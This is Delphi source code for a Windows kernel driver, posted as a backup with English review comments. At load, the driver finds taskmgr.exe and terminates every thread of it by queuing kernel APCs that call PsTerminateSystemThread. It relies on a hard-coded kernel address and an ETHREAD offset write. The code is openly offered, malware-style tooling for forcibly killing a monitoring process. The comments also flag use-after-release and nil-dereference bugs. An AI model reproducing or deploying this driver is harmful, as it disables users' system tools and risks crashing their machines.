delphi版插apc殺進程驅動源碼

從c代碼轉的,備份一下,裏面有硬編碼

unit MyDriver;
{$HINTS OFF}
{$WARNINGS OFF}
interface

uses
nt_status, ntoskrnl, native, winioctl, fcall, macros;

// NOTE(review): the units above are project-local kernel bindings. Every NT type and
// routine used below without a declaration in this file (PKAPC, PETHREAD, DbgPrint,
// ExAllocatePool, ZwQuerySystemInformation, PsLookupProcessByProcessId, ...)
// presumably comes from them - verify against those units.

type
// Input layout for the kill IOCTL. It is never read by DispatchControl in this unit;
// the XP_PsGetNextProcessThread field suggests the kernel address that Kill hard-codes
// was originally meant to be supplied by the caller.
TKILL = record
PID: DWORD;
XP_PsGetNextProcessThread: dword;
end;
PKILL = ^TKILL;

const
DeviceName = '\Device\KPTest'; /// device object name, created in _DriverEntry
DosDeviceName = '\??\KPTest'; /// symbolic link name, created in _DriverEntry
NtKernel = 'ntoskrnl.exe'; /// module the external declarations below import from
SystemProcessesAndThreadsInformation = 05; /// SYSTEM_INFORMATION_CLASS used by gettargetpid
// Declared but never referenced anywhere in this unit; MyTerminateThread writes the
// literal $10 to a hard-coded ETHREAD offset instead of using this name.
PS_CROSS_THREAD_FLAGS_SYSTEM =$10;

type
// Local mirrors of the DDK definitions needed by KeInitializeApc and
// KeStackAttachProcess; field order and packing must match the kernel's own layout.
KAPC_ENVIRONMENT = (OriginalApcEnvironment, AttachedApcEnvironment, CurrentApcEnvironment);
MODE = (KernelMode, UserMode, MaximumMode);
KPRIORITY = LONG;
PKAPC_STATE = ^KAPC_STATE;
KAPC_STATE = packed record
ApcListHead: array[0..1] of TListEntry;
Process: PVOID;
KernelApcInProgress: boolean;
KernelApcPending: boolean;
UserApcPending: boolean;
end;

// Counted ANSI string (ANSI_STRING layout). gettargetpid fills it with
// RtlUnicodeStringToAnsiString and then hands Buffer to _stricmp as a C string.
PAnsiString = ^TAnsiString;
TAnsiString = packed record
Length: Word;
MaximumLength: Word;
Buffer: PChar;
end;
// APC callback signatures. KernelTerminateThreadRoutine in the implementation is a
// function returning Ulong rather than a PKKERNEL_ROUTINE procedure; it is passed to
// KeInitializeApc with @, so the compiler never checks the mismatch.
PKNORMAL_ROUTINE = procedure(NormalContext, SystemArgument1, SystemArgument2: PVOID); stdcall;
PKRUNDOWN_ROUTINE = procedure(Apc: PKAPC); stdcall;
PKKERNEL_ROUTINE = procedure(Apc: PKAPC; NormalRoutine: PKNORMAL_ROUTINE; NormalContext, SystemArgument1, SystemArgument2: PVOID); stdcall;

// Driver entry point; declared stdcall here, the implementation header omits the directive.
function _DriverEntry(pDriverObject: PDRIVER_OBJECT; pusRegistryPath: PUNICODE_STRING): NTSTATUS; stdcall;

// ntoskrnl.exe imports resolved by decorated name. Only ObDereferenceObject and
// PsTerminateSystemThread are used in this unit; the other six are declared but unused.
function KeStackAttachProcess(Process: PVOID; ApcState: PKAPC_STATE): NTSTATUS; stdcall; external NtKernel name '_KeStackAttachProcess';
function KeUnstackDetachProcess(ApcState: PKAPC_STATE): NTSTATUS; stdcall; external NtKernel name '_KeUnstackDetachProcess';
function PsGetProcessImageFileName(Process: PVOID): PUCHAR; stdcall; external NtKernel name '_PsGetProcessImageFileName';
function KeGetCurrentThread(): PKThread; stdcall; external NtKernel name '_KeGetCurrentThread';
function PsGetCurrentThread(): PEThread; stdcall; external NtKernel name '_PsGetCurrentThread';
function PsGetCurrentProcessId(): HANDLE; stdcall; external NtKernel name '_PsGetCurrentProcessId';
procedure ObDereferenceObject(MyObject: PVOID); stdcall; external NtKernel name '_ObDereferenceObject';
// NOTE(review): no stdcall directive, unlike every other external above; the kernel
// export is stdcall, so this declaration relies on the unit's default convention - verify.
function PsTerminateSystemThread(ExitStatus: NTSTATUS): NTSTATUS; external NtKernel name '_PsTerminateSystemThread';

type
// Signature of PsGetNextProcessThread, which is not an ntoskrnl export; Kill reaches it
// through a hard-coded address cast to this type.
TPSGETNEXTPROCESSTHREAD = function(Process: pvoid; Thread: PETHREAD): PETHREAD; stdcall;


// Declared as returning NTSTATUS; the DDK prototype is VOID. Called from MyTerminateThread.
function KeInitializeApc(
Apc: PKAPC;
Thread: PVOID;
Environment: KAPC_ENVIRONMENT;
KernelRoutine: PKKERNEL_ROUTINE;
RundownRoutine: PKRUNDOWN_ROUTINE;
NormalRoutine: PKNORMAL_ROUTINE;
ProcessorMode: KPROCESSOR_MODE;
NormalContext: PVOID
): NTSTATUS; stdcall; external NtKernel name '_KeInitializeApc';

// Declared as returning NTSTATUS; the DDK prototype returns BOOLEAN, and
// MyTerminateThread casts the result back to BOOLEAN.
function KeInsertQueueApc(
Apc: PKAPC;
SystemArgument1: PVOID;
SystemArgument2: PVOID;
Increment: KPRIORITY
): NTSTATUS; stdcall; external NtKernel name '_KeInsertQueueApc';

var
// Device and symbolic-link names. Initialised in _DriverEntry; the link name is used
// again by DriverUnload.
g_usDeviceName, g_usSymbolicLinkName: UNICODE_STRING;


implementation

// Returns the PID of the process named 'taskmgr.exe' found in the
// ZwQuerySystemInformation process list, or 0 when none matches.
// NOTE(review): the procname parameter is never read - the comparison below uses the
// literal 'taskmgr.exe', so the argument passed from _DriverEntry has no effect.
// Known issues, left exactly as in the original:
//  - PsLookupProcessByProcessId takes a reference on the matching process that is
//    never released, and the early 'exit' skips ExFreePool(p).
//  - pnProcessName.Buffer is allocated by RtlUnicodeStringToAnsiString(..., True) on
//    every iteration and never freed.
//  - pTemp is advanced inside the with-block and the until clause then tests the entry
//    pTemp now points at, so the last entry of the list is never compared.
//  - aa, iCnt, pThreadAddr and uModule are unused locals.
function gettargetpid(procname: pchar): ULONG;
var
cb: DWORD;
p, pTemp: PVOID;
pnProcessName: TAnsiString;
aa: Tansistring; // unused
iCnt: integer; // unused
pThreadAddr: Pointer; // unused
uModule: ULONG; // unused
process: PVOID;
begin
cb := 0;
result := 0;
// Size probe: with a zero-length buffer the call presumably only fills cb with the
// number of bytes required (the status is not checked).
ZwQuerySystemInformation(SystemProcessesAndThreadsInformation, @p, 0, @cb);
if cb <> 0 then
begin
p := ExAllocatePool(PagedPool, cb);
if p <> nil then
begin
if ZwQuerySystemInformation(SystemProcessesAndThreadsInformation,
p, cb, @cb) = STATUS_SUCCESS then
begin
pTemp := p;
repeat
// 'with' binds the current entry once, before pTemp is advanced below.
with (PSYSTEM_PROCESS_INFORMATION(pTemp))^.Process_NT5.Process do
begin
// AllocateDestinationString = True: the ANSI buffer is heap-allocated and never freed.
RtlUnicodeStringToAnsiString(@pnProcessName, @ProcessName, True);
//DbgPrint(pnProcessName.Buffer);
if (_stricmp(pnProcessName.Buffer, 'taskmgr.exe') = 0) then
begin
// Takes a reference that is never dropped; 'exit' also leaves p allocated.
PsLookupProcessByProcessId(ProcessId, process);
result := ProcessId;
exit;
end;
inc(PCHAR(pTemp), NextEntryDelta);
end;
// Tests the *next* entry's delta, so an entry with NextEntryDelta = 0 is skipped.
until (PSYSTEM_PROCESS_INFORMATION(pTemp))^.Process_NT5.Process.NextEntryDelta = 0;
end;
ExFreePool(p);
end;
end;
end;


/// Handler shared by IRP_MJ_CREATE and IRP_MJ_CLOSE. There is no per-handle state to
/// set up or tear down, so the request is completed at once with STATUS_SUCCESS and
/// no bytes transferred.
function DispatchCreateClose(p_DeviceObject: PDEVICE_OBJECT; p_Irp: PIRP): NTSTATUS; stdcall;
const
  NoBytesTransferred = 0;
begin
  Result := STATUS_SUCCESS;
  with p_Irp^ do
  begin
    IoStatus.Information := NoBytesTransferred;
    IoStatus.Status := Result;
  end;
  // Complete the IRP without a priority boost.
  IofCompleteRequest(p_Irp, IO_NO_INCREMENT);
end;

// Kernel-routine half of the APC queued by MyTerminateThread. It runs in the context
// of the thread the APC was queued to, releases the KAPC allocated in
// MyTerminateThread, and then calls PsTerminateSystemThread on that thread; if the
// terminate succeeds, the DbgPrint below never executes.
// NOTE(review): declared as a function returning Ulong, whereas PKKERNEL_ROUTINE in the
// interface section is a stdcall procedure - the mismatch is hidden by the @ cast at the
// KeInitializeApc call site. The return value of PsTerminateSystemThread is discarded;
// the only result is whatever DbgPrint returns.
function KernelTerminateThreadRoutine(
Apc: PKAPC;
NormalRoutine: PKNORMAL_ROUTINE;
NormalContext: PVOID;
SystemArgument1: PVOID;
SystemArgument2: PVOID
):Ulong;stdcall;
begin
ExFreePool(Apc);
PsTerminateSystemThread(0);
//DbgPrint('oh yeah!');
result:=DbgPrint('oh yeah!');
end;

// Queues a kernel-mode APC on Thread whose kernel routine
// (KernelTerminateThreadRoutine) terminates that thread. Returns False when Thread is
// not a readable address, otherwise the result of KeInsertQueueApc cast to BOOLEAN.
// Known issues, left exactly as in the original:
//  - MmIsAddressValid only reports whether the page is accessible; it does not
//    establish that Thread is an ETHREAD.
//  - Apc is dereferenced in DbgPrint ('Apc^ is') before the nil check, and
//    KeInitializeApc/KeInsertQueueApc are still called when ExAllocatePool returned nil.
//  - The raw write of $10 at ETHREAD offset $248 is build-specific: neither the offset
//    nor the value is derived from a header. The unused constant
//    PS_CROSS_THREAD_FLAGS_SYSTEM in the interface section carries the same value.
//  - KeInsertQueueApc is declared NTSTATUS in this unit and cast to BOOLEAN here; the
//    DDK prototype returns BOOLEAN directly.
function MyTerminateThread(Thread: PETHREAD): BOOLEAN;
var
bSucceed: BOOLEAN;
Apc :PKAPC;
begin
Apc := nil;
bSucceed := FALSE;
if not (MmIsAddressValid(Thread)) then
begin
result := false;
exit;
end;
// KAPC must live in non-paged memory; freed by KernelTerminateThreadRoutine.
Apc := ExAllocatePool(NonPagedPool, sizeof(KAPC));
DbgPrint('ethread is:%x', ulong(Thread));
// Hard-coded ETHREAD offset and value; valid only for the kernel build the author used.
PULONG(ulong(Thread)+ $248 )^:=$00000010;
// Dereferences Apc before it is checked for nil.
DbgPrint('Apc^ is:%x', Apc^);
DbgPrint('Apc is:%x', Apc);
DbgPrint('sizeof(Apc) is:%x', sizeof(KAPC));
DbgPrint('Thread is:%x', Thread);
DbgPrint('OriginalApcEnvironment is:%x', OriginalApcEnvironment);
DbgPrint('@KernelTerminateThreadRoutine is:%x', @KernelTerminateThreadRoutine);
DbgPrint('KernelMode is:%x', KernelMode);

// Only logs on allocation failure; execution continues with Apc = nil.
if Apc=nil then DbgPrint('失敗');
KeInitializeApc(Apc,
Thread,
OriginalApcEnvironment,
@KernelTerminateThreadRoutine,
nil,
nil,
KPROCESSOR_MODE(KernelMode),
nil);
bSucceed := BOOLEAN(KeInsertQueueApc(Apc, PVOID(0), PVOID(0), 0)); 
result := bSucceed;
end;

// Walks every thread of eprocess through PsGetNextProcessThread and hands each one to
// MyTerminateThread. Always returns STATUS_SUCCESS: st is never updated and the
// BOOLEAN result of MyTerminateThread is discarded.
// NOTE(review): $8057EAEC is a hard-coded kernel address for the non-exported
// PsGetNextProcessThread, valid only for the single ntoskrnl build the author used; on
// any other build this transfers control to whatever happens to be at that address.
// The TKILL record in the interface section has an XP_PsGetNextProcessThread field for
// exactly this value, but it is never read.
function Kill(eprocess: pvoid): NTSTATUS;
var
st: NTSTATUS;
ethread: PETHREAD;
MyPspGetNetxtThread: TPSGETNEXTPROCESSTHREAD;
begin
st := STATUS_SUCCESS;
ethread := nil;
// Build-specific absolute address cast to the PsGetNextProcessThread signature.
MyPspGetNetxtThread := TPSGETNEXTPROCESSTHREAD($8057EAEC);
ethread := MyPspGetNetxtThread(eprocess, nil);
while ethread <> nil do
begin
MyTerminateThread(ethread);
ethread := MyPspGetNetxtThread(eprocess, ethread);
end;
result := st;
end;

// Resolves pid to its EPROCESS and passes it to Kill. A pid of 0 is ignored after the
// DbgPrint. Nothing is reported back: the status from Kill is stored in st and dropped.
// NOTE(review): ObDereferenceObject is called *before* Kill uses eprocess, so the
// reference taken by PsLookupProcessByProcessId is released while the pointer is still
// in use by Kill and MyTerminateThread.
procedure KillByPid(pid: ulong);
var
st: NTSTATUS;
eprocess: pvoid;
begin
st := STATUS_SUCCESS;
eprocess := nil;
DbgPrint('PID is:%d', pid);
if pid=0 then exit;
st := PsLookupProcessByProcessId(pid, eprocess);
if (NT_SUCCESS(st)) then
begin
// Reference dropped here, yet eprocess is dereferenced by Kill on the next line.
ObDereferenceObject(eprocess);
st := Kill(eprocess);
end;
end;


// IRP_MJ_DEVICE_CONTROL handler. Recognises IOCTL_KILL_PROCESS (FILE_DEVICE_UNKNOWN,
// function $805, METHOD_BUFFERED, read+write access) and completes the IRP with
// STATUS_SUCCESS and 0 bytes of output; any other control code is completed with
// STATUS_INVALID_DEVICE_REQUEST.
// NOTE(review): the IOCTL currently has no effect - pSystemBuffer, dwInputBufferLength
// and dwOutBufferLength are fetched but never used, and the TKILL layout declared in
// the interface section is never consulted, so there is also no length validation of
// the METHOD_BUFFERED input. IOCTL_KILL_PROCESS is recomputed on every call rather than
// being a unit-level const.
function DispatchControl(p_DeviceObject: PDEVICE_OBJECT; p_Irp: PIRP): NTSTATUS; stdcall;
var
dwIoControlCode: DWORD;
dwInputBufferLength, dwOutBufferLength: DWORD;
status: NTSTATUS;
dwBytesReturned: DWORD;
psl: PIO_STACK_LOCATION;
IOCTL_KILL_PROCESS: DWORD;
pSystemBuffer: Pointer;
//InBuffer: PKILL;
begin
dwBytesReturned := 0;
psl := IoGetCurrentIrpStackLocation(p_Irp); { current IRP stack location }
dwIoControlCode := psl^.Parameters.DeviceIoControl.IoControlCode; /// the control code
dwInputBufferLength := psl^.Parameters.DeviceIoControl.InputBufferLength; /// input buffer size (unused below)
dwOutBufferLength := psl^.Parameters.DeviceIoControl.OutputBufferLength; /// output buffer size (unused below)
pSystemBuffer := p_Irp^.AssociatedIrp.SystemBuffer; /// METHOD_BUFFERED system buffer (unused below)

IOCTL_KILL_PROCESS := CTL_CODE(FILE_DEVICE_UNKNOWN, $805, METHOD_BUFFERED, FILE_READ_ACCESS + FILE_WRITE_ACCESS); /// build our control code

if dwIoControlCode = IOCTL_KILL_PROCESS then /// our control code
begin
DbgPrint('Control Code is:0x%X', dwIoControlCode); /// log the control code
dwBytesReturned := 0; /// bytes returned to the caller (none)
status := STATUS_SUCCESS;
end else
begin
status := STATUS_INVALID_DEVICE_REQUEST;
end;

p_Irp^.IoStatus.Status := status;
p_Irp^.IoStatus.Information := dwBytesReturned;

IofCompleteRequest(p_Irp, IO_NO_INCREMENT); /// complete the IRP
Result := status;
end;

/// Unload routine: remove the symbolic link first, then the device object it pointed at.
procedure DriverUnload(p_DriverObject: PDRIVER_OBJECT); stdcall;
var
  devObj: PDEVICE_OBJECT;
begin
  DbgPrint('Driver Unload!');
  devObj := p_DriverObject^.DeviceObject;
  IoDeleteSymbolicLink(@g_usSymbolicLinkName); // \??\KPTest
  IoDeleteDevice(devObj);                       // \Device\KPTest
end;

///驅動入口點

/// Driver entry point.
// Initialises the device and symbolic-link names, then - before any device object
// exists - looks up taskmgr.exe via gettargetpid and terminates it via KillByPid, so
// the termination happens unconditionally at driver load and does not depend on the
// IOCTL interface. Afterwards creates \Device\KPTest and \??\KPTest and installs the
// dispatch routines.
// Returns STATUS_SUCCESS only when both the device and the symbolic link were created;
// in every other case STATUS_DEVICE_CONFIGURATION_ERROR is returned and the real
// IoCreateDevice / IoCreateSymbolicLink status is not propagated or logged.
// NOTE(review): DeviceObject is declared as TDeviceObject (a record on the stack), not
// PDEVICE_OBJECT; whether the IoCreateDevice binding in the ntoskrnl unit accepts it,
// and whether IoDeleteDevice(@DeviceObject) below removes the right object, depends on
// that binding - verify. No explicit security descriptor is applied to the device.
// The interface declaration carries stdcall; this header omits the directive.
function _DriverEntry(pDriverObject: PDRIVER_OBJECT; pusRegistryPath: PUNICODE_STRING): NTSTATUS;
var
status: NTSTATUS;
mypid:ulong;
DeviceObject: TDeviceObject;
begin
status := STATUS_DEVICE_CONFIGURATION_ERROR;
/// initialise the UNICODE_STRING structures
RtlInitUnicodeString(g_usDeviceName, DeviceName);
RtlInitUnicodeString(g_usSymbolicLinkName, DosDeviceName);
// gettargetpid ignores its argument and always looks for 'taskmgr.exe'.
mypid:= gettargetpid('taskmgr.exe');
DbgPrint('mypid is:%d', mypid);
KillByPid(mypid);
/// create the device
if (IoCreateDevice(pDriverObject, 0, @g_usDeviceName,
FILE_DEVICE_UNKNOWN, 0, FALSE,
DeviceObject) = STATUS_SUCCESS) then
begin
/// device created
DbgPrint('Create Device Success'); /// debug output
/// create the symbolic link
if (IoCreateSymbolicLink(@g_usSymbolicLinkName,
@g_usDeviceName) = STATUS_SUCCESS) then
begin
/// symbolic link created
DbgPrint('Create SymbolicLink Success'); /// debug output
/// install our dispatch routines
pDriverObject^.MajorFunction[IRP_MJ_CREATE] := @DispatchCreateClose; /// IRP_MJ_CREATE and IRP_MJ_CLOSE share one handler
pDriverObject^.MajorFunction[IRP_MJ_CLOSE] := @DispatchCreateClose;
pDriverObject^.MajorFunction[IRP_MJ_DEVICE_CONTROL] := @DispatchControl; /// handles DeviceIoControl
pDriverObject^.DriverUnload := @DriverUnload; /// run when the driver is unloaded
status := STATUS_SUCCESS; /// return STATUS_SUCCESS
end else /// symbolic link creation failed
begin
DbgPrint('Create SymbolicLink Failed'); /// debug output
IoDeleteDevice(@DeviceObject); /// delete the device
end;
end;
Result := status;
end;

end.